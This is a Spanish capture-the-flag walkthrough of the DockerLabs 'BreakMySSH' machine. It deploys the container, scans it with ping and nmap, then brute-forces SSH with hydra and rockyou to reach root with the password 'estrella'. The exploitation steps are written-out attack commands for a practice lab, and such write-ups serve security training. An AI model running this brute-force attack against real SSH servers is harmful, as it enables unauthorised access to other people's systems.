> For the complete documentation index, see [llms.txt](https://brias.gitbook.io/brias/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://brias.gitbook.io/brias/dockerlabs/dificultad-muy-facil/breakmyssh.md).

# BreakMySSH

#### **Despliegue de la Máquina:**

**1. Descarga:**

Accedemos a la web oficial de [DockerLabs](https://dockerlabs.es/), buscamos la máquina **BreakMySSH** y pulsamos en el botón de descarga. Esto nos redirige a un enlace de Mega, desde donde descargamos un archivo comprimido que contiene tanto la imagen de la máquina como el script necesario para su ejecución.

**2. Descompresión:**

Utilizamos la herramienta `7z` para descomprimir el archivo descargado:

```bash
7z x breakmyssh.zip
```

<figure><img src="/files/KQNufD4qKuqPGt8SRgJm" alt=""><figcaption></figcaption></figure>

**3. Ejecución:**

Ejecutamos el script `auto_deploy.sh` para desplegar la máquina en Docker:

```bash
bash auto_deploy.sh breakmyssh.tar
```

Al finalizar, el script nos proporciona la dirección IP interna de la máquina (`172.17.0.2`), que utilizaremos para interactuar con ella.

<figure><img src="/files/bNAZS5Eqp4525fM3ogE6" alt=""><figcaption></figcaption></figure>

***

#### **Reconocimiento:**

**1. Verificación de Conectividad:**

Primero, comprobamos que la máquina esté activa y responda a las solicitudes de red utilizando el comando `ping`:

```bash
ping -c 1 172.17.0.2
```

El valor `TTL=64` indica que el sistema operativo es **Linux**.

<figure><img src="/files/pLfPOMVTW0P74h0vpanP" alt=""><figcaption></figcaption></figure>

**2. Escaneo de Puertos:**

Realizamos un escaneo de puertos con `nmap` para identificar los puertos abiertos:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts
```

**Resultado:**

* **Puerto 22:** `SSH`.

<figure><img src="/files/v82vXy7bhAM59XqEAZNF" alt=""><figcaption></figcaption></figure>

**3. Escaneo Detallado:**

Ejecutamos un escaneo más exhaustivo para obtener información sobre la versión del servicio SSH:

```bash
nmap -p22 -sCV 172.17.0.2 -oN targeted
```

**Resultado:**

* **Puerto 22:** OpenSSH 7.7.

<figure><img src="/files/PbMKbzsAIZZKDIYBhgli" alt=""><figcaption></figcaption></figure>

***

#### **Explotación:**

**1. Fuerza Bruta con Hydra:**

Dado que no hay más puertos abiertos, procedemos a realizar un ataque de fuerza bruta contra el servicio SSH utilizando `hydra`:

```bash
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 172.17.0.2 ssh -t 50
```

**Resultado:** La contraseña encontrada para el usuario `root` es `estrella`.

<figure><img src="/files/tn9w1lZiNCYiAFgUiXEH" alt=""><figcaption></figcaption></figure>

**2. Acceso al Sistema:**

Utilizamos las credenciales obtenidas para acceder al sistema mediante SSH:

```bash
ssh root@172.17.0.2
```

**Resultado:** Obtenemos acceso a la máquina como el usuario `root`.

<figure><img src="/files/qeX49RPbl4y9Yd3UvUw1" alt=""><figcaption></figcaption></figure>
